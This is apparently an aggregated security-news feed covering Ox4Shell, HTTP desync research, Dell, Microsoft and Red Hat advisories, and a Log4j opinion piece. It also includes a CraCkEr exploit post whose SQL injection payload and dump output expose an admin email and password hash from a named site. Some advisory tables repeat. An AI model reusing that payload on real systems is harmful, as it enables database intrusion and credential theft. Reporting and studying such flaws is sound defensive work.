Open source utility exposes payloads without running vulnerable Java code

Open source utility exposes payloads without running vulnerable Java code

A Log4Shell de-obfuscation tool that promises simple, rapid payload analysis without the risk of “critical side effects” has been showcased at Black Hat USA.

The open source ‘Ox4Shell’ utility was demonstrated on the Arsenal track in Las Vegas yesterday (August 10) by Daniel Abeles and Ron Vider of AppSec testing platform Oxeye.

**‘True intent’**

Abeles believes the tool offers a potent combination of benefits lacking among other de-obfuscators of the critical vulnerability in Apache Log4j, the Java logging utility so widely distributed that the ‘Log4Shell’ flaw (CVE-2021-44228) affects hundreds of millions of devices.

“I worked on a web application firewall \[WAF\] myself for several years, so I can personally relate to the struggle of understanding the true intent of obfuscated payloads and the challenge it poses to security teams,” he told The Daily Swig said in advance of his presentation.

RELATED ‘Endemic’ Log4j bug set to persist in the wild for at least a decade, US government warns

The researchers couldn’t find any other tools that were as easy to use as Ox4Shell – a simple Python script – but didn’t require the user to run any vulnerable code in the process.

“We emulated most of the transformations a parallel Java code would do, without the risk of running vulnerable Java code,” Abeles said. “This is especially important when integrating such tools in a production pipeline (e.g. WAF rules), to ensure no critical side effects.”

**Maximizing accuracy**

With obfuscated payloads “intimidating for most security engineers” and “time-consuming and tedious” for even the most experienced, Oxeye set out “to provide the security community a lean, simple way to de-obfuscate Log4Shell payloads.”

Abeles said the needs of AppSec engineers informed the tool’s specification, while the scarcity “of public obfuscated payloads to test Ox4Shell against” prompted them to “team up with several application security teams to gather a wide variety of payloads, so we can ensure minimum false negatives and false positives rate”.

Catch up on the latest Log4Shell news and analysis

This process culminated with Ox4Shell’s release in January 2022, a month after Log4Shell surfaced.

The tool counters threat actors’ attempts to circumvent WAF rules and complicate exploit analysis, by decoding obfuscated payloads, including base64 commands, “into an intuitive and readable form” – thus revealing their “true functionality” and “dramatically” reducing security teams’ analysis time.

**Mock data**

Oxeye says Ox4Shell enables defenders to comply with lookup functions that attackers can abuse via Log4Shell to identify targeted machines by feeding them mock data that they can control.

A mock.json file is used to insert common values into lookup functions. “For example, if the payload contains the value , we can replace it with a custom mock value,” reads the Ox4Shell GitHub page.

This ‘lookup mocking’ means users can “replace certain data lookups with mocked data, so the final result would look more realistic and well suited to the specific organization using it”, Abeles told The Daily Swig.

A recent US government report warned that vulnerable Log4j instances could persist for “a decade or longer”. With Ox4Shell set to remain useful for some time to come, Oxeye is planning to expand the tool’s capabilities to mock even more lookup functions based on community feedback.

TBC article TBC

Black Hat USA: Log4j de-obfuscator Ox4Shell ‘dramatically’ reduces analysis time

Threat actors can abuse weaknesses in HTTP request handling to launch damaging browser-based attacks on website users, researcher says.

BLACK HAT USA – LAS VEGAS – A security researcher who previously demonstrated how attackers can abuse weaknesses in the way websites handle HTTP requests warned that the same issues can be used in damaging browser-based attacks against users.  

James Kettle, director of PortSwigger, described his research as shedding new light on so-called desync attacks that exploit disagreements in how a website's back-end and front-end servers interpret HTTP requests. Previously, at Black Hat USA 2019, Kettle showed how attackers could trigger these disagreements — over things like message length, for instance — to route HTTP requests to a back-end component of their choice, steal credentials, and invoke unexpected responses from an application and other malicious actions. Kettle also has previously shown how HTTP/2 implementation errors can put websites at risk of compromise.

Kettle's new research focuses on how threat actors can exploit the same improper HTTP request handling issues to also attack website users and steal credentials, install backdoors, and compromise their systems in other ways. Kettle said he had identified HTTP handling anomalies that enabled such client-side desync attacks on sites such as Amazon.com, those using the AWS Application Load Balancer, Cisco ASA WebVPN, Akamai, Varnish Cache servers, and Apache HTTP Server 2.4.52 and earlier.

The main difference between server-side desync attacks and client-side desync is that the former requires attacker-controlled systems with a reverse proxy front end and at least partly malformed requests, Kettle said in a conversation with Dark Reading following his presentation. A browser-powered attack takes place within the victim's Web browser, using legitimate requests, he said. Kettle showed a proof-of-concept where he was able to store information such as authentication tokens of random users on Amazon in his shopping list as an example of what an attacker would be able to do. Kettle discovered he could have gotten each infected victim on Amazon's site to relaunch the attack to others.

"This would have released a desync worm — a self-replicating attack which exploits victims to infect others with no user interaction, rapidly exploiting every active user on Amazon," Kettle said. Amazon has since fixed the issue.

Cisco opened a CVE for the vulnerability (CVE-2022-20713) after Kettle informed the company about it and described the issue as allowing an unauthenticated, remote attacker to conduct browser-based attacks on website users. "An attacker could exploit this vulnerability by convincing a targeted user to visit a website that can pass malicious requests to an ASA device that has the Clientless SSL VPN feature enabled," the company noted. "A successful exploit could allow the attacker to conduct browser-based attacks, including cross-site scripting attacks, against the targeted user."

Apache identified its HTTP request smuggling vulnerability (CVE-2022-22720) as tied to a failure "to close inbound connection when errors are encountered discarding the request body." Varnish described its vulnerability (CVE-2022-23959) as allowing attackers to inject spurious responses on client connections.

In a whitepaper released today, Kettle said there were two separate scenarios where HTTP handling anomalies could have security implications,

One was first-request validation, where front-end servers that handle HTTP requests use the Host header to identify which back-end component to route each request to. These proxy servers often have a whitelist of hosts that people are allowed to access. What Kettle discovered was that some front-end or proxy servers only use the whitelist for the first request sent over a connection and not for subsequent requests sent over the same connection. So, attackers can abuse this to gain access to a target component by first sending a request to an allowed destination and then following up with a request to their target destination.

Another closely related but far more frequent issue that Kettle encountered stemmed from first-request routing. With first-request routing, the front-end or proxy server looks at the HTTP request's Host header to decide where to route the request to and then routes all subsequent requests from the client down to the same back end. In environments where the Host header is handled in an unsafe way, this presents attackers with an opportunity to target any back-end component to carry out a variety of attacks, Kettle said.

The best way for websites to mitigate client-side desync attacks is to use HTTP/2 end-to-end, Kettle said. It's generally not a good idea to have a front end that supports HTTP/2 and a back end that is HTTP/1.1. "If your company routes employee's traffic through a forward proxy, ensure upstream HTTP/2 is supported and enabled," Kettle advised. "Please note that the use of forward proxies also introduces a range of extra request-smuggling risks beyond the scope of this paper."

New HTTP Request Smuggling Attacks Target Web Browsers

Dell Wyse Management Suite 3.6.1 and below contains a Sensitive Data Exposure vulnerability. A low privileged malicious user could potentially exploit this vulnerability in order to obtain credentials. The attacker may be able to use the exposed credentials to access the target device and perform unauthorized actions.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-33924

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability with which an attacker with no access to create rules may potentially exploit this vulnerability and create rules. The attacker may create a schedule to run the rule.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

CVE-2022-33925

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability in UI. A remote authenticated attacker may potentially exploit this vulnerability by bypassing access controls in order to download reports containing sensitive information.

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2022-33926

Wyse Management Suite 3.7 and earlier contains an improper access control vulnerability. A remote malicious user may exploit this vulnerability in order to retain access to a file repository after it has been revoked.

7.1

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

CVE-2022-33927

Wyse Management Suite 3.7 and earlier contains a Session Fixation vulnerability. An unauthenticated attacker may exploit this by taking advantage of a user with multiple active sessions in order to hijack a user's session.

5.4

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVE-2022-33928

Wyse Management Suite 3.7 and earlier contains a Plain-text Password Storage Vulnerability in UI. An attacker with low privileges may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.

6.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CVE-2022-29090

Wyse Management Suite 3.7 and earlier contains a Sensitive Data Exposure vulnerability. A low privileged malicious user may potentially exploit this vulnerability in order to obtain credentials. The attacker may be able to use the exposed credentials to access the target device and perform unauthorized actions.

8.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

CVE-2022-33929

Wyse Management Suite 3.7 and earlier contains a Reflected Cross-Site Scripting Vulnerability in EndUserSummary page. An authenticated attacker may potentially exploit this vulnerability, leading to the execution of malicious HTML or JavaScript code in a victim user's web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.

6.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE-2022-33930

Wyse Management Suite 3.7 and earlier contains Information Disclosure in Devices error pages. An attacker may potentially exploit this vulnerability, leading to the disclosure of certain sensitive information. The attacker may be able to use the exposed information for access and further vulnerability research.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE-2022-33931

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability in UI. An attacker with no access to Alert Classification page may potentially exploit this vulnerability, leading to changing the alert categories.

6.3

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE-2022-34365

Wyse Management Suite 3.7 contains a Path Traversal Vulnerability in Device API. An attacker may potentially exploit this vulnerability, to gain unauthorized read access to the files stored on the server file system, with the privileges of the running web application.

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

OpenJDK

CVE-2022-21476 CVE-2022-21449 CVE-2022-21496 CVE-2022-21434 CVE-2022-21426 CVE-2022-21443

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

Zlib

CVE-2018-25032

Dapper

CVE-2017-15945

Spring Framework

CVE-2022-22971 CVE-2022-22970 CVE-2022-22968

Spring Security

CVE-2022-22978 CVE-2022-22976

Netty

CVE-2022-24823 CVE-2022-25647

Apache tika

CVE-2022-30126 CVE-2022-25169

Tomcat

CVE-2022-29885

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-33924

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability with which an attacker with no access to create rules may potentially exploit this vulnerability and create rules. The attacker may create a schedule to run the rule.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

CVE-2022-33925

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability in UI. A remote authenticated attacker may potentially exploit this vulnerability by bypassing access controls in order to download reports containing sensitive information.

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2022-33926

Wyse Management Suite 3.7 and earlier contains an improper access control vulnerability. A remote malicious user may exploit this vulnerability in order to retain access to a file repository after it has been revoked.

7.1

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

CVE-2022-33927

Wyse Management Suite 3.7 and earlier contains a Session Fixation vulnerability. An unauthenticated attacker may exploit this by taking advantage of a user with multiple active sessions in order to hijack a user's session.

5.4

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVE-2022-33928

Wyse Management Suite 3.7 and earlier contains a Plain-text Password Storage Vulnerability in UI. An attacker with low privileges may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.

6.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CVE-2022-29090

Wyse Management Suite 3.7 and earlier contains a Sensitive Data Exposure vulnerability. A low privileged malicious user may potentially exploit this vulnerability in order to obtain credentials. The attacker may be able to use the exposed credentials to access the target device and perform unauthorized actions.

8.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

CVE-2022-33929

Wyse Management Suite 3.7 and earlier contains a Reflected Cross-Site Scripting Vulnerability in EndUserSummary page. An authenticated attacker may potentially exploit this vulnerability, leading to the execution of malicious HTML or JavaScript code in a victim user's web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.

6.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE-2022-33930

Wyse Management Suite 3.7 and earlier contains Information Disclosure in Devices error pages. An attacker may potentially exploit this vulnerability, leading to the disclosure of certain sensitive information. The attacker may be able to use the exposed information for access and further vulnerability research.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE-2022-33931

Wyse Management Suite 3.7 and earlier contains an Improper Access control vulnerability in UI. An attacker with no access to Alert Classification page may potentially exploit this vulnerability, leading to changing the alert categories.

6.3

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE-2022-34365

Wyse Management Suite 3.7 contains a Path Traversal Vulnerability in Device API. An attacker may potentially exploit this vulnerability, to gain unauthorized read access to the files stored on the server file system, with the privileges of the running web application.

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

OpenJDK

CVE-2022-21476 CVE-2022-21449 CVE-2022-21496 CVE-2022-21434 CVE-2022-21426 CVE-2022-21443

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

Zlib

CVE-2018-25032

Dapper

CVE-2017-15945

Spring Framework

CVE-2022-22971 CVE-2022-22970 CVE-2022-22968

Spring Security

CVE-2022-22978 CVE-2022-22976

Netty

CVE-2022-24823 CVE-2022-25647

Apache tika

CVE-2022-30126 CVE-2022-25169

Tomcat

CVE-2022-29885

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

 

Dell Wyse Management Suite

3.7 and earlier

3.8

Dell Wyse Management Suite

 

 

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

 

Dell Wyse Management Suite

3.7 and earlier

3.8

Dell Wyse Management Suite

 

 

**Kiitokset**

Dell Technologies would like to thank CMSecurity for reporting CVE-2022-33927.  
Dell Technologies would like to thank whitehattushu for reporting CVE-2022-33924, CVE-2022-33925, and CVE-2022-33926.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-07-18

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

18 heinäk. 2022

CVE-2022-29090: DSA-2022-134: Dell Wyse Management Suite Security Update for Multiple Vulnerabilities.

Improper Input Validation vulnerability in HTTP/2 frame handling of Apache Traffic Server allows an attacker to smuggle requests.  This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-31780

As many as 121 new security flaws were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild.
Of the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues

As many as 121 new security flaws were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild.

Of the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues have been listed as publicly known at the time of the release.

It's worth noting that the 121 security flaws are in addition to 25 shortcomings the tech giant addressed in its Chromium-based Edge browser late last month and the previous week.

Topping the list of patches is CVE-2022-34713 (CVSS score: 7.8), a case of remote code execution affecting the Microsoft Windows Support Diagnostic Tool (MSDT), making it the second flaw in the same component after Follina (CVE-2022-30190) to be weaponized in real-world attacks within three months.

The vulnerability is also said to be a variant of the flaw publicly known as DogWalk, which was originally disclosed by security researcher Imre Rad in January 2020.

"Exploitation of the vulnerability requires that a user open a specially crafted file," Microsoft said in an advisory. "In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file."

Alternatively, an attacker could host a website or leverage an already compromised site that contains a malware-laced file designed to exploit the vulnerability, and then trick potential targets into clicking on a link in an email or an instant message to open the document.

"This is not an uncommon vector and malicious documents and links are still used by attackers to great effect," Kev Breen, director of cyber threat research at Immersive Labs, said. "It underscores the need for upskilling employees to be wary of such attacks."

CVE-2022-34713 is one of the two remote code execution flaws in MSDT closed by Redmond this month, the other being CVE-2022-35743 (CVSS score: 7.8). Security researchers Bill Demirkapi and Matt Graeber have been credited with reporting the vulnerability.

Microsoft also resolved three privilege escalation flaws in Exchange Server that could be abused to read targeted email messages and download attachments (CVE-2022-21980, CVE-2022-24477, and CVE-2022-24516) and one publicly-known information disclosure vulnerability (CVE-2022-30134) in Exchange which could as well lead to the same impact.

"Administrators should enable Extended Protection in order to fully remediate this vulnerability," Greg Wiseman, product manager at Rapid7, commented about CVE-2022-30134.

The security update further remediates multiple remote code execution flaws in Windows Point-to-Point Protocol (PPP), Windows Secure Socket Tunneling Protocol (SSTP), Azure RTOS GUIX Studio, Microsoft Office, and Windows Hyper-V.

The Patch Tuesday fix is also notable for addressing dozens of privilege escalation flaws: 31 in Azure Site Recovery, a month after Microsoft squashed 30 similar bugs in the business continuity service, five in Storage Spaces Direct, three in Windows Kernel, and two in the Print Spooler module.

**Software Patches from Other Vendors**

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   NVIDIA
*   Qualcomm
*   Samba
*   SAP
*   Schneider Electric
*   Siemens, and
*   VMware

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack

Given the lack of reporting requirements, the findings are more like assumptions. Here's what organizations can do to minimize exposure.

The most significant finding in the Cyber Safety Review Board's voluminous analysis of the Log4j vulnerability is what it didn't observe.

The board is "not aware of any significant Log4j-based attacks on critical infrastructure systems." Also, "exploitation of Log4j occurred at lower levels than many experts predicted, given the severity of the vulnerability." That's remarkable since Log4j is one of the most severe vulnerabilities of the past decade.

Given how widely the library is used, it's difficult to accept that a vast vulnerability like this — identified as "endemic" — _didn't_ cause any real damage to critical infrastructures. The report saying there weren't any significant incidents is no reason to drop our guard, however. In fact, we need to be more vigilant than ever.

The report acknowledges that unlike, say, government agencies reviewing transportation disasters, there was "no crash site or damaged vehicle to inspect, no stress tests to perform on failed equipment, and no wiring diagrams to review." And since critical infrastructure owners and operators were not yet required to report breaches to the federal government, there's a significant blind spot. The findings in the report are just assumptions, and organizations should not feel comforted by them.

Log4j remains deeply embedded in systems everywhere — it's one of the few pieces of software that popular applications such as Apache Struts, ElasticSearch, Redis, Kafka, and others have in common. We're also told that during the board's review, community stakeholders identified "new compromises, new threat actors, and new learnings."

Some of this represents the democratization of software programming. This is a good thing — but we need to be aware that as long as we have software, we'll have software vulnerabilities.

**Knowing Every Link in the Chain**

Guarding against weak links in the software supply chain requires adequate knowledge of every link in the chain — an elusive goal. Most organizations have terrible asset management practices — and it's impossible to secure technologies in the infrastructure when no one is sure what those technologies are, where they're stored, and how they're used.

There are always new tools and capabilities coming down the pike, and with cloud applications, it's even worse. For homegrown applications in the cloud, developers typically don't see it as their responsibility to track which software components are in the mix. Their focus is on output, not sourcing. And with software-as-a-service (SaaS) applications, there's a near-total dependence on the third-party vendor doing the right thing.

Even without consequences we can point to, Log4j offers further proof that software supply chain security is fundamentally broken.

**What to Do Next**

So what can we do to fix it? The CSRB report serves up recommendations rich with anecdotes. They're well-meaning but too opaque for companies to implement in real-world settings. For example, we're told that "organizations should be prepared to address Log4j vulnerabilities for years to come." But how?

There are steps organizations can take. Again, there are no guarantees — foolproof protection is impossible. But the dangers can be contained and minimized.

First, organizations need greater awareness of all technologies in use; asset management is useless without up-to-date asset inventory. This is an ongoing priority, and it requires developer buy-in. Almost every business uses open source software, so asset inventory must extend down to the dependency level. This isn't sexy, but it may be one of the most essential activities to carry out effectively.

Developers and their software are one thing, yet in every enterprise business users now deploy the apps they believe are best for getting the job done. Employers are understandably concerned about security and compliance, but heavy-handed enforcement (i.e., attempting to block access) represents a losing proposition for everyone. Employee application choice and enterprise security are not mutually exclusive — and with technologies now available, they go hand-in-hand.

In the past we'd call this unsanctioned use of applications shadow IT, but now there's a better term: unmanageable applications. They're very common and easy to spot because they don't support identity and security standards. IT-authorized applications are hard enough to police; unmanageable applications are an even bigger challenge.

Second, we need to move toward zero-trust architecture. This concept is getting a lot of buzz, but there are challenges in deploying zero trust for unmanageable applications. Implementing zero trust requires multiple layers of controls. Trying to apply zero-trust principles to unmanageable applications that don't support industry standards like SAML (for authentication) and SCIM (for adding and removing users) is extremely difficult. Unmanageable applications cannot be added to a zero-trust protected surface since they don't support identity standards. A fundamental zero-trust principle defines who can access a data, application, asset, or service (DAAS) element. Organizations must ensure they include all business apps, including the unmanageable ones, in their zero-trust strategy, not only those that support standards.

We haven't dodged a bullet with Log4j, and there are more zero-days on the way. The CSRB report should serve as a wake-up call for organizations worldwide to dig deeper into their software supply chain for _all_ applications. Physical supply chains have long had this attention; software deserves the same scrutiny.

Don't Take the Cyber Safety Review Board's Log4j Report at Face Value

Matrimonial PHP Script version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                       [ Exploits ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : uisort.com                     │ │                                         ││  Vendor   : Uisort Technologies Pvt. Ltd.  │ │                                         ││  Software : Matrimonial PHP Script v1.0    │ │  Matrimonial Script PHP tailored with   ││  Demo     : stage.matrimic.in              │ │  advanced features website              ││  Vuln Type: Remote SQL Injection           │ │  & mobile apps from matrimic            ││  Method   : GET                            │ │                                         ││  Impact   : Database Access                │ │                                         ││                                            │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise.                                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                     © CraCkEr 2022                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'Userdetails[ud_gender]' is vulnerable---Parameter: Userdetails[ud_gender] (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: Userdetails[ud_gender]=1 AND 2636=2636---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0.0[INFO] fetching current database[INFO] retrieved: stage_db_qa[INFO] fetching number of tables for database 'stage_db_qa'Database: stage_db_qa[37 tables]+--------------------+| YiiCache           || YiiLog             || mc_admin           || mc_blocklist       || mc_caste           || mc_city            || mc_cms             || mc_contact         || mc_contact_history || mc_country         || mc_currency        || mc_deleteprofile   || mc_education       || mc_feedback        || mc_gallery         || mc_height          || mc_horoscope       || mc_import_jobs     || mc_interest        || mc_language        || mc_message         || mc_occupation      || mc_partner         || mc_plan            || mc_profile_viewed  || mc_religion        || mc_searchlist      || mc_settings        || mc_shortlist       || mc_sms_history     || mc_state           || mc_subcaste        || mc_success_story   || mc_toungue         || mc_transaction     || mc_user            || mc_userdetails     |+--------------------+[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'Database: stage_db_qaTable: mc_admin[4 columns]+--------------+-------------+| Column       | Type        |+--------------+-------------+| admin_email  | varchar(32) || admin_id     | int(11)     || admin_name   | varchar(32) || admin_status | int(11)     |+--------------+-------------+[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'Database: stage_db_qaTable: mc_admin[1 entry]+----------+-----------------------+------------+--------------+| admin_id | admin_email           | admin_name | admin_status |+----------+-----------------------+------------+--------------+| 1        | admin@mat\x81imic.com | Admin      | 1            |+----------+-----------------------+------------+--------------+[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'Database: stage_db_qaTable: mc_user[20 columns]+------------------------+--------------+| Column                 | Type         |+------------------------+--------------+| api_token              | varchar(255) || code                   | varchar(128) || device                 | varchar(32)  || user_activecode        | varchar(32)  || user_activedate        | datetime     || user_activestatus      | int(11)      || user_android_device_id | varchar(255) || user_email             | varchar(32)  || user_id                | int(11)      || user_ios_device_id     | varchar(255) || user_ipaddress         | varchar(32(  || user_lastlogin         | datetime     || user_mobile            | bigint(20)   || user_opensource        | varchar(32)  || user_password          | varchar(255) || user_salt              | varchar(64)  || user_status            | int(11)      || user_type              | int(11)      || user_userid            | int(11)      || user_verified_token    | varchar(255) |+------------------------+--------------+[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'Database: stage_db_qaTable: mc_user[1 entry]+---------+--------------------+------------------------------------------+-----------+-------------+| user_id | user_email         | user_password                            | user_type | user_userid |+---------+--------------------+------------------------------------------+-----------+-------------+| 1       | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1         | 1           |+---------+--------------------+------------------------------------------+-----------+-------------+                                Possible Algorithms: SHA1                                [-] Done

Matrimonial PHP Script 1.0 SQL Injection

Red Hat Security Advisory 2022-5928-01 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.6 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.5, and includes bug fixes and enhancements. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat JBoss Enterprise Application Platform 7.4.6 Security update  
Advisory ID:       RHSA-2022:5928-01  
Product:           Red Hat JBoss Enterprise Application Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5928  
Issue date:        2022-08-08  
CVE Names:         CVE-2021-44906 CVE-2022-24823 CVE-2022-25647   
=====================================================================

1. Summary:

A security update is now available for Red Hat JBoss Enterprise Application  
Platform 7.4.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java  
applications based on the WildFly application runtime. This release of Red  
Hat JBoss Enterprise Application Platform 7.4.6 serves as a replacement for  
Red Hat JBoss Enterprise Application Platform 7.4.5, and includes bug fixes  
and enhancements. See the Red Hat JBoss Enterprise Application Platform  
7.4.6 Release Notes for information about the most significant bug fixes  
and enhancements included in this release.  
Security Fix(es):

* com.google.code.gson-gson: Deserialization of Untrusted Data in  
com.google.code.gson-gson (CVE-2022-25647)

* org.jboss.hal-hal-parent: minimist: prototype pollution (CVE-2021-44906)

* netty: world readable temporary file containing sensitive data  
(CVE-2022-24823)

3. Solution:

Before applying this update, ensure all previously released errata relevant  
to your system have been applied. For details about how to apply this  
update, see: https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2066009 - CVE-2021-44906 minimist: prototype pollution  
2080850 - CVE-2022-25647 com.google.code.gson-gson: Deserialization of Untrusted Data in com.google.code.gson-gson  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data

5. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-17119 - Update quick start references to "Red Hat Developer Studio" to new name "Red Hat CodeReady Studio"  
JBEAP-23344 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.Final-redhat-00001 to 1.5.3.SP1  
JBEAP-23444 - (7.4.z) WFLY-16231 - Github clone URLs need to be updated for jboss-eap7 repository since Github dropped git:// protocol  
JBEAP-23492 - (7.4.z) Upgrade HAL from 3.3.12.Final-redhat-00001 to 3.3.13.Final-redhat-00001  
JBEAP-23526 - [GSS](7.4.z) Upgrade JBoss Remoting from 5.0.24.SP1-redhat-00001 to 5.0.25.SP1  
JBEAP-23528 - (7.4.z) Upgrade Jandex from 2.2.3.Final-redhat-00001 to 2.4.2.Final-redhat-00001  
JBEAP-23546 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.12 to 3.3.13+  
JBEAP-23550 - [QA](7.4.z) Upgrade jberet from 1.3.9.SP1 to 1.3.9.SP2  
JBEAP-23551 - (7.4.z) Upgrade PicketLink from 2.5.5.SP12-redhat-00009 to 2.5.5.SP12-redhat-00011  
JBEAP-23554 - (7.4.z) Upgrade Mojarra from 2.3.14.SP04-redhat-00001 to 2.3.14.SP05  
JBEAP-23556 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP05-redhat-00002 to 3.0.0.SP06  
JBEAP-23557 - (7.4.z) Upgrade WildFly Core from 15.0.13.Final-redhat-00001 to 15.0.14.Final  
